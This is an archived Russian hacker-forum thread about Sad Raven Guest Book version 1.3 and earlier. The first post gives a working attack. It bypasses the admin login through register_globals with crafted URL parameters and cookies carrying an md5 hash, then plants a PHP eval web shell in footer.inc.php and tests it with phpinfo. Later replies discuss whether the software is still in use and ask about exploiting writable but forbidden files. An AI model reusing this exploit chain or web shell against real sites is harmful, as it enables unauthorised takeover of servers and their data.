Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Sad Raven Guest Book <=v1.3

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> Sad Raven Guest Book <=v1.3
Имя
Сообщение << Старые топики   Новые топики >>
Sad Raven Guest Book &lt;=v1.3 - 2009-10-14 15:01:58.173333   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
Она же sr guest.

Вход в админ панель:

&lt;?php if (!isset($alogin) || md5($pass) != $Password[$alogin] || !isset($Password[$alogin])) ?&gt;
1. Админка находится по адресу: http://site.com/guest/admin.php
2. Зайти можно с таким запросом (условие - register globals=on):

http://site.com/guest/admin.php?pass=3105&alogin=3105&Password[3105]=37e7897f62e8d91b1ce60515829ca282
3105 - цифра от балды, а 37e7897f62e8d91b1ce60515829ca282 - это md5(3105)

но мы пока не админы, т.к. в админку пустило, но при попытке выполнить какие-либо действия в админке нас опять выкидывает на залогивание, смотрим:

1. После перехода по ссылке выше у нас появятся две куки:

Имя: alogin Содержимое: 3105 Узел: site.com Путь: /guest/ Имя: pass Содержимое: 3105 Узел: site.com Путь: /guest/
к которым надо будет добавить третью (через тот же плагин для FF cookie editor):

Имя: Password[3105] Содержимое: 37e7897f62e8d91b1ce60515829ca282 Узел: site.com Путь: /guest/
и вот тогда мы уже полноценные админы

2. Заливка шелла:

- Идем в http://site.com/guest/admin.php?design
- Правим footer.inc.php - вставляем
&lt;?php eval(stripslashes($_GET[e]));?&gt;
для 100% уверенности, обходим magic_quotes=ON

3. проверяем:

http://site.com/guest/index.php?e=phpinfo();

4. Льем шелл.
Post #: 1
RE: Sad Raven Guest Book &lt;=v1.3 - 2009-10-15 16:54:32.926666   
JTG

Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
Уже лет 5 этой гостевой хрени, неужели ещё кто-то пользуется?
Post #: 2
RE: Sad Raven Guest Book &lt;=v1.3 - 2009-10-15 18:06:36.180000   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
да, и по сей день, уязвимость так сказать из практики
Post #: 3
RE: Sad Raven Guest Book &lt;=v1.3 - 2010-03-11 12:50:46.783333   
Дочь Билла Гейтса

Сообщений: 46
Оценки: 0
Присоединился: 2008-05-24 00:37:53.486666
возможно ли что-то сделать, если файлы из папки design доступны на запись, но выдают 403 ошибку при попытке доступа?
Post #: 4
Страниц:  [1]
Все форумы >> [Уязвимости] >> Sad Raven Guest Book &lt;=v1.3







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.